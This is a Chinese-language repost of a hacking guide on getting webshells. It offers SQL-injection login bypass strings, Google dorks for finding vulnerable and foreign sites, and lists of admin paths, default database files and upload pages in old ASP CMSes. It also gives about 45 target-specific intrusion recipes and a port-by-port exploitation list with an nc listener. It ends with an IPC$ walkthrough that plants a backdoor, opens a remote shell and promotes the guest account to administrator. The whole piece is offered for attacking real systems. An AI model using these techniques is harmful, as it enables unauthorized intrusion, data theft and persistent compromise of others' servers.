怎样拿shell的技巧

怎样拿shell的技巧怎样拿shell的技巧结合本人和网络上的一些资料,仅供参考!经典的用户名密码‘or’=’or’‘or’1’=’1这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….inurl:用于搜索网页上包含的URL.这个语法对寻找网页上的搜索,帮助之类的很有用.intext:只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字).site:可以限制你搜索范

怎样拿shell的技巧结合本人和网络上的一些资料,仅供参考!

经典的用户名密码
‘or’=’or’
‘or’1’=’1

这2个密码在很多网站后台,QQ空间相册都可以登陆,不过不是100%而已….

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字).
site: 可以限制你搜索范围的域名.
filetype: 搜索文件的后缀或者扩展名
intitle: 限制你搜索的网页标题.
allintitle: 搜索所有关键字构成标题的网页. 但是推荐不要使用
link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面

===================================================
intext:管理
filetype:mdb
inurl:file
site:xx.com filetype:txt 查找TXT文件 其他的依次内推
site:xx.com intext:管理
site:xx.com inurl:login
site:xx.com intitle:后台
查看服务器使用的程序
site:xx.com filetype:asp
site:xx.com filetype:php
site:xx.com filetype:jsp
查看上传漏洞:
site:xx.com inurl:file
site:xx.com inurl:load
查找注射点:
site:xx.com filetype:asp
site:tw inurl:asp?id= 这个是找台湾的

site:jp inurl:asp?id= 这个是找日本的

site:ko inurl:asp?id= 这个是找韩国的
依次类推

intitle:旁注- 网站小助手filetype:asp
inurl:editor/db/
inurl:eWebEditor/db/
inurl:bbs/data/
inurltabackup/
inurl:blog/data/
inurl:\boke\data
inurl:bbs/database/
inurl:conn.asp
inc/conn.asp

管理入口:
admin
admin_index
admin_admin
index_admin
admin/index
admin/default
admin/manage
admin/login
manage_index
index_manage
superadmin
admin1
admin_login
login_admin
ad_login
ad_manage
count
manager
guanli
denglu
houtai
houtaiguanli
htgl
adminlogin
adminuserlogin
adm_login
chklogin
chkadmin
users
adduser
admin_user
edituser
adminadduser
member
members
editmember
adminmember
addmember
logout
exit
login_out
adminedit
admin_edit
delete
admindelete
admin_delete
up
upload
upfile
backup
config
test
webmaster
root
aadmin
admintab
admin_main
art
article
databases
db
dbase
devel
files
forum
girl
girls
htdocs
idea
ideas
include
includeinc
includes
incoming
install
manual
misc
mrtg
private
program
programming
programs
public
secret
secrets
server_stats
server-info
server-status
set
setting
setup


snmp
source
sources
sql
statistics
Stats
telephone
temp
temporary
tool
tools
usage
weblog
weblogs
webstats
work
wstats
wwwlog
wwwstats
wenzhang
admin/login.asp
admin_index.asp
bbs/admin_index.asp
article/admin/admin.asp
admin/aspcheck.asp
inc/config.asp
eWebEditor/admin_login.asp
editor/admin_login.asp
login/login
login/index
login/super
login1
update
count_admin
add_admin
admin_pass
newbbs/login
down/login
bbs/admin/login
main/login
admin/manage.asp
manage/login.asp
user.asp
conn.asp
logout.asp
readme.txt
说明.txt
manager/login
manager/login.asp
manager/admin.asp
login/admin/admin.asp
houtai/admin.asp
guanli/admin.asp
denglu/admin.asp
admin_login/admin.asp
admin_login/login.asp
admin/manage/admin.asp
admin/manage/login.asp
admin/default/admin.asp
admin/default/login.asp
member/admin.asp
member/login.asp
administrator/admin.asp
administrator/login.asp
强大的数据库:
database/PowerEasy4.mdb #动易网站管理系统4.03数据库
database/PowerEasy5.mdb
database/PowerEasy6.mdb
database/PowerEasy2005.mdb
database/PowerEasy2006.mdb
database/PE_Region.mdb
data/dvbbs7.mdb #动网论坛数据库
databackup/dvbbs7.mdb #动网论坛备份数据库
bbs/databackup/dvbbs7.mdb #动网论坛备份数据库
data/zm_marry.asp #动网sp2美化版数据库
databackup/dvbbs7.mdb
admin/data/qcdn_news.mdb #青创文章管理系统数据库
firend.mdb #交友中心数据库
database/newcloud6.mdb #新云管理系统6.0数据库
database/%23newasp.mdb #新云网站系统
blogdata/L-BLOG.mdb #L-BLOG v1.08数据库
blog/blogdata/L-BLOG.mdb #L-BLOG v1.08数据库
database/bbsxp.mdb #BBSXP论坛数据库
bbs/database/bbsxp.mdb #BBSXP论坛数据库
access/sf2.mdb #雪人论坛程序v2.0数据库
data/Leadbbs.mdb #LeadBBS论坛 v3.14数据库
bbs/Data/LeadBBS.mdb #LeadBBS论坛 v3.14数据库
bbs/access/sf2.mdb #雪人论坛程序v2.0数据库
fdnews.asp #六合专用BBS数据库
bbs/fdnews.asp #六合专用BBS数据库
admin/ydxzdate.asa #雨点下载系统 v2.0+sp1数据库
data/down.mdb #动感下载系统xp ver2.0数据库
data/db1.mdb #动感下载系统xp v1.3数据库
database/Database.mdb #轩溪下载系统 v3.1数据库
db/xzjddown.mdb #lhdownxp下载系统数据库
db/play.asp #娱乐先锋论坛 v3.0数据库
mdb.asp #惊云下载系统 v1.2数据库
admin/data/user.asp #惊云下载系统 v3.0数据库
data_jk/joekoe_data.asp #乔客6.0数据库
data/news3000.asp #沸腾展望新闻系统 v1.1数据库
data/appoen.mdb #惠信新闻系统4.0数据库
data/12912.asp #飞龙文章管理系统 v2.1数据库
database.asp #动感极品下载管理系统 v3.5
download.mdb #华仔软件下载管理系统 v2.3
dxxobbs/mdb/dxxobbs.mdb #dxxobbs论坛数据库
db/6k.asp #6kbbs 用户名:admin 密码:6kadmin
database/snowboy.mdb #雪孩论坛 默认后台admin/admin_index.asp
database/%23mmdata.mdb #依爽社区
editor/db/ewebeditor.mdbeWebEditor/db/ewebeditor.mdb

上穿漏洞:
/eWebEditor/upload.asp #eWebEditor上传页面
/editor/upload.asp #eWebEditor上传页面
/bbs/upfile.asp #动网论坛上传页面
/forum/upfile.asp #动网论坛上传页面
/dvbbs/upfile.asp #动网论坛上传页面
/upfile_soft.asp #动力管理系统上传页面
/upload.asp?action=upfile #乔客6.0上传页面
/upfile.asp #动网论坛上传页面
/bbs/down_addsoft.asp #动网论坛插件上传页面
/bbs/down_picupfile.asp #动网论坛插件上传页面
/down_picupload.asp #动网论坛插件上传页面
/admin/admin_upfile.asp #管理员后台上传页面
/admin/upfile.asp #管理员后台上传页面
/admin/upload.asp #管理员后台上传页面
/admin/uploadfaceok.asp #尘缘上传页面
/news/admin/upfile.asp #新闻管理上传页面
/admin_upfile.asp #飞龙文章管理系统 v2.0
/user_upfile.asp #飞龙文章管理系统 v2.0
/upload_flash.asp #秋叶购物商城上传页面
/Saveannounce_upload.asp #购物中心上传页面
/UploadFace.asp #沸腾展望新闻系统 v1.1
/bbs/diy.asp #Domian3.0默认木马
/UploadSoft/diy.asp #Domian3.0默认木马
/diy.asp #Domian3.0默认木马
/upload/upload.asp #某某文章管理系统
/mybbs/saveup.asp #MYBBS论坛上传页面
/dxxobbs/upload.asp #DxxoBBS论坛上传页面
/img_upfile.asp #任我飞扬驿站上传页面
/Upfile_SoftPic.asp #动力管理系统上传页面
/upfile_flash.asp #秋叶购物商城上传页面

PHP的:
phpmyadmin
include/config.inc.php
include/config.php
lib/config.php

首先打http://www.baidu.com,在关键词输入框中输入index of mp3,选择回车搜索,得到了一些mp3网站的资源列表

以下是百度搜索排名
index of mpeg4
3. index of mp3
4. index of rmvb
5. index of rm
7. index of movie
8. index of swf
9. index of jpg
10. index of admin
12. index of pdf
13. index of doc
14. index of wmv
15. index of mdb
16. index of mpg
17. index of mtv
18. index of software
19. index of mov
20. index of asf
23. index of lib
24. index of vod
25. index of rar
27. index of exe
28. index of iso
29. index of video
30. index of book
31. index of soft
32. index of chm
33. index of password
34. index of game
35. index of music
36. index of dvd
37. index of mid
38. index of ebook
40. index of download

最重要的记住页面一些关键的字 具有一定的特性的比如
[转到父目录]
这几个字虽然很普通但是不要忘了一般有遍历目录漏洞的站点都有个这个

bbs/data/+转到父目录
data/+转到父目录
/+转到父目录
转到父目录rmvb
inurl:/diy.asp

—–附:”这些资料有些年代,适用于初学者!

1,
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用’or’=’or’来登陆

4,
关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 ‘or’=’or’

5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。
默认数据库地址blogdata/acblog.asa
关键字:acblog

7.
百度 /htdocs
注册里可以直接上传asa文件!

8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version

9.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp

10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)

11.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,

12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.
现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

挖掘鸡的关键字 添 setup.asp

15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了

16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个”store/”除去,再加上database/comersus.mdb 试试

17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 */Conn.asp

18.
百度里输入/skins/default/

19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用

20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp

21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 “关于本站 – 网站帮助 – 广告合作 – 下载声明 – 友情连接 – 网站地图 – 管理登录”
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp

动力入侵:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp

23.
注射漏洞
百度搜索ioj’s blog

24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:’or’=’or’

26.
入侵魔兽私服
需要的工具:ASP木马一只。
Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb

27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp

28.
国外站的爆库漏洞
关键字:sad Raven’s Guestbook
密码地址:/passwd.dat
后台地址:/admin.php

29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:”intextiscuz! 4.1.0”

30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马

31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp

32.
关键字:Team5 Studio All rights reserved
默认数据库ta/team.mdb

33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp

34.
关键子 XXX inurl:Nclass.asp
在”系统设置”里写个木马。
会被保存到 在 config.asp内。

35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData 动网数据库备份默认路径

36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:’or’=’or’

37.
关键字owered byCDN_NEWS
随便扫遍文章加一个’ ,来试探注入点
后台地址:admin_index.asp

38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马…..
进访问uppic anran.asp 登陆马.

39.
关键字ower System Of Article Management Ver 3.0 Build 20030628
默认数据库tabase\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!

40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1 gov.jp/ asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧

41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd

42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: ‘or’=’ 或者 ‘or”=”or’ 登录 进入
默认数据库地址atabase/DataShop.mdb

43.
关键字:** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话木马

44.
工具:一句话木马
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!

45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin
各个端口的入侵方法
1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后
SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口
sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433
(这个是正向连接)
2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破
。(tscrack.exe)
4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或
dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系
统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口 用real554.exe入侵。
7. 6129端口 用DameWare6129.exe入侵。
8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。
9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC 1.C:netuse ”>\127.0.0.1\IPC /user:admintitratorsadministratorsIP(127.0.0.1administrators2.C:>copysrv.exe “>\\127.0.0.1\admin srv.exeTools 是指admin用户的 c:\winnt\system32\,大家还可
以使用c d ,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:>net time [url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 查
查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:>at
[url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启
动啊. 5. C:>net time [url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上
午 11:05,那就准备 开始下面的命令。 6. C:>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意
端口是99。Telnet默认的是23端口,但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的
Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打 算建立一
个Telnet服务!这就要用到ntlm了 7.C:>copy ntlm.exe >127.0.0.1\admin 用Copy命令把
ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入
ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这 个程序在对方计算机上
运行)。当出现”DONE”的时候,就说明已经启动正常。然后使 用”net start telnet”来开启Telnet服务
! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作 一样简单!(然
后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:>net
user guest /active:yes 将对方的Guest用户激活 11. C:>net user guest 1234 将Guest的密码改为
1234,或者你要设定的密码 12. C:>net localgroup administrators guest /add 将Guest变为
Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我 们可以用guest再次访问这台计
算机)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/37714.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注